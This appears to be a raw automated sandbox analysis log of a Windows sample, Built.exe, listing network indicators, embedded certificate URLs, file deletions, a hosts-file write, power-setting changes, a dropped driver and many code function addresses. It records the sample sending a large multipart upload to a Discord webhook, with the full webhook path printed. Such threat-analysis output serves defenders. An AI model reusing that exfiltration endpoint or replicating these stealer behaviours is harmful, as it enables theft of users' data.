                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0
                Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0
                Source: global trafficDNS traffic detected: DNS query: blank-16pis.in
                Source: global trafficDNS traffic detected: DNS query: ip-api.com
                Source: global trafficDNS traffic detected: DNS query: discord.com
                Source: unknownHTTP traffic detected: POST /api/webhooks/1319333831601422477/Gz1lBx-zJ-f6c5VmTw7-Emfjq_tqsL0pI1D5turBQtQOU8FjLlkxesj3qj89-C61Kjse HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 729612User-Agent: python-urllib3/2.3.0Content-Type: multipart/form-data; boundary=f3d0f4c2f8d39500f2ddb3ec81b69ca3
                Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
                Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
                Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
                Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\ONBQCLYSPU.docxJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\LTKMYBSEYZ.pdfJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\NWTVCDUMOB.pngJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\NWTVCDUMOB.pngJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\KATAXZVCPS.xlsxJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: conhost.exeProcess created: 42
                Source: cmd.exeProcess created: 48

                System Summary

                barindex
                Source: 47SXvEQ.exeStatic PE information: section name:
                Source: 47SXvEQ.exeStatic PE information: section name: .idata
                Source: 47SXvEQ.exeStatic PE information: section name:
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\ProgramData\Microsoft\svchost.exeFile created: C:\Windows\TEMP\qnibnfgnagzt.sys
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_fpekgtoi.xrk.ps1
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF6266410004_2_00007FF626641000
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF626648BD04_2_00007FF626648BD0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF6266669D44_2_00007FF6266669D4
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF6266517B04_2_00007FF6266517B0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF6266697984_2_00007FF626669798
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF62665DF604_2_00007FF62665DF60
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF6266588044_2_00007FF626658804
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF626651FD04_2_00007FF626651FD0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF6266498704_2_00007FF626649870
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF62666411C4_2_00007FF62666411C
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF6266618E44_2_00007FF6266618E4
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF626655DA04_2_00007FF626655DA0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF6266536104_2_00007FF626653610
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF62665E5E04_2_00007FF62665E5E0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF626651DC44_2_00007FF626651DC4
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF626659F104_2_00007FF626659F10
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF626665EEC4_2_00007FF626665EEC
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF62664A34B4_2_00007FF62664A34B
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF626651BC04_2_00007FF626651BC0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF6266664884_2_00007FF626666488
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF6266609384_2_00007FF626660938
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF626652C804_2_00007FF626652C80
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF626663C804_2_00007FF626663C80
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF626665C704_2_00007FF626665C70
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF62664AD1D4_2_00007FF62664AD1D
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF62664A4E44_2_00007FF62664A4E4
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF6266519B44_2_00007FF6266519B4
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF6266581544_2_00007FF626658154
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF6266609384_2_00007FF626660938
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF626653A144_2_00007FF626653A14
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF6266521D44_2_00007FF6266521D4
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF62665DACC4_2_00007FF62665DACC
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF6266410005_2_00007FF626641000
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF62664A34B5_2_00007FF62664A34B
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF6266669D45_2_00007FF6266669D4
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF6266517B05_2_00007FF6266517B0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF6266697985_2_00007FF626669798
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF62665DF605_2_00007FF62665DF60
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF6266588045_2_00007FF626658804
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF626651FD05_2_00007FF626651FD0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF6266498705_2_00007FF626649870
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF62666411C5_2_00007FF62666411C
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF6266618E45_2_00007FF6266618E4
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF626655DA05_2_00007FF626655DA0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF6266536105_2_00007FF626653610
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF62665E5E05_2_00007FF62665E5E0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF626651DC45_2_00007FF626651DC4
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF626659F105_2_00007FF626659F10
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF626665EEC5_2_00007FF626665EEC
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF626648BD05_2_00007FF626648BD0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF626651BC05_2_00007FF626651BC0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF6266664885_2_00007FF626666488
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF6266609385_2_00007FF626660938
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF626652C805_2_00007FF626652C80
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF626663C805_2_00007FF626663C80
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF626665C705_2_00007FF626665C70
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF62664AD1D5_2_00007FF62664AD1D
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF62664A4E45_2_00007FF62664A4E4
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF6266519B45_2_00007FF6266519B4
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF6266581545_2_00007FF626658154
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF6266609385_2_00007FF626660938
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF626653A145_2_00007FF626653A14
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF6266521D45_2_00007FF6266521D4
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF62665DACC5_2_00007FF62665DACC
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA19305_2_00007FFDF0FA1930
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA12F05_2_00007FFDF0FA12F0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF14132305_2_00007FFDF1413230
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C114F5_2_00007FFDF10C114F
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10EB1C05_2_00007FFDF10EB1C0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10DF2005_2_00007FFDF10DF200
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10DF0605_2_00007FFDF10DF060
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C29CD5_2_00007FFDF10C29CD
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C6CB75_2_00007FFDF10C6CB7
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C3B935_2_00007FFDF10C3B93
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF11F73105_2_00007FFDF11F7310
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C51695_2_00007FFDF10C5169
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C5D855_2_00007FFDF10C5D85
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C70455_2_00007FFDF10C7045
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C1EA15_2_00007FFDF10C1EA1
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF12FF4605_2_00007FFDF12FF460
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10EB5505_2_00007FFDF10EB550
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C21B75_2_00007FFDF10C21B7
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C609B5_2_00007FFDF10C609B
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C6F235_2_00007FFDF10C6F23
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF112F7005_2_00007FFDF112F700
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C22E85_2_00007FFDF10C22E8
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF12639D05_2_00007FFDF12639D0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF1277A105_2_00007FFDF1277A10
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C41655_2_00007FFDF10C4165
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C3FDA5_2_00007FFDF10C3FDA
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C6A825_2_00007FFDF10C6A82
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C655A5_2_00007FFDF10C655A
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C30C15_2_00007FFDF10C30C1
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF11F7AF05_2_00007FFDF11F7AF0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10DBD605_2_00007FFDF10DBD60
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C22895_2_00007FFDF10C2289
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C27665_2_00007FFDF10C2766
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF11EFE305_2_00007FFDF11EFE30
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C32E75_2_00007FFDF10C32E7
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C4C375_2_00007FFDF10C4C37
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10DBF205_2_00007FFDF10DBF20
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C34865_2_00007FFDF10C3486
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C1B315_2_00007FFDF10C1B31
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF11F61305_2_00007FFDF11F6130
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C1A4B5_2_00007FFDF10C1A4B
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C70775_2_00007FFDF10C7077
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C6FFA5_2_00007FFDF10C6FFA
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C36935_2_00007FFDF10C3693
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C1CC15_2_00007FFDF10C1CC1
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C4E4E5_2_00007FFDF10C4E4E
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C5A605_2_00007FFDF10C5A60
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C60D75_2_00007FFDF10C60D7
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C5E205_2_00007FFDF10C5E20
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF11F26705_2_00007FFDF11F2670
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C5D9E5_2_00007FFDF10C5D9E
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C23F15_2_00007FFDF10C23F1
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C5B0F5_2_00007FFDF10C5B0F
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C1B225_2_00007FFDF10C1B22
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF1262A905_2_00007FFDF1262A90
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C4D045_2_00007FFDF10C4D04
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF11A2B405_2_00007FFDF11A2B40
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C72C05_2_00007FFDF10C72C0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C46335_2_00007FFDF10C4633
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF11FB0205_2_00007FFDF11FB020
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C6EEC5_2_00007FFDF10C6EEC
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C213F5_2_00007FFDF10C213F
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10DEF005_2_00007FFDF10DEF00
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C5BF05_2_00007FFDF10C5BF0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF12792105_2_00007FFDF1279210
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10E52005_2_00007FFDF10E5200
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C68C55_2_00007FFDF10C68C5
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C71085_2_00007FFDF10C7108
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C5F0B5_2_00007FFDF10C5F0B
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C55105_2_00007FFDF10C5510
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C44C65_2_00007FFDF10C44C6
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10DD2605_2_00007FFDF10DD260
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C53A85_2_00007FFDF10C53A8
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C42875_2_00007FFDF10C4287
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C15C85_2_00007FFDF10C15C8
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C54CF5_2_00007FFDF10C54CF
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF12015C05_2_00007FFDF12015C0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C54CA5_2_00007FFDF10C54CA
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C3A8F5_2_00007FFDF10C3A8F
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C542F5_2_00007FFDF10C542F
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C655F5_2_00007FFDF10C655F
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C12995_2_00007FFDF10C1299
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C4AC55_2_00007FFDF10C4AC5
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C50475_2_00007FFDF10C5047
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C560F5_2_00007FFDF10C560F
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C216C5_2_00007FFDF10C216C
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C4F3E5_2_00007FFDF10C4F3E
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C21355_2_00007FFDF10C2135
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C53C15_2_00007FFDF10C53C1
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C63895_2_00007FFDF10C6389
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C59F75_2_00007FFDF10C59F7
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C3A855_2_00007FFDF10C3A85
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF12799E05_2_00007FFDF12799E0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C50AB5_2_00007FFDF10C50AB
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF12619205_2_00007FFDF1261920
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C72525_2_00007FFDF10C7252
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C38325_2_00007FFDF10C3832
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C35FD5_2_00007FFDF10C35FD
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C1CFD5_2_00007FFDF10C1CFD
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C73655_2_00007FFDF10C7365
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C1D835_2_00007FFDF10C1D83
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF11F5E305_2_00007FFDF11F5E30
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C266C5_2_00007FFDF10C266C
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C72A75_2_00007FFDF10C72A7
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C3BA25_2_00007FFDF10C3BA2
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C29825_2_00007FFDF10C2982
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C2D0B5_2_00007FFDF10C2D0B
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C16225_2_00007FFDF10C1622
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C47465_2_00007FFDF10C4746
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C57D15_2_00007FFDF10C57D1
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C378D5_2_00007FFDF10C378D
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C43595_2_00007FFDF10C4359
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C14245_2_00007FFDF10C1424
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C2E8C5_2_00007FFDF10C2E8C
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C41015_2_00007FFDF10C4101
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C5B735_2_00007FFDF10C5B73
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF12001205_2_00007FFDF1200120
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF11704405_2_00007FFDF1170440
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C2C755_2_00007FFDF10C2C75
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF12782E05_2_00007FFDF12782E0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF11EC5F05_2_00007FFDF11EC5F0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C177B5_2_00007FFDF10C177B
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10DC6205_2_00007FFDF10DC620
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10DC4805_2_00007FFDF10DC480
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C69E25_2_00007FFDF10C69E2
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C25EF5_2_00007FFDF10C25EF
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C22AC5_2_00007FFDF10C22AC
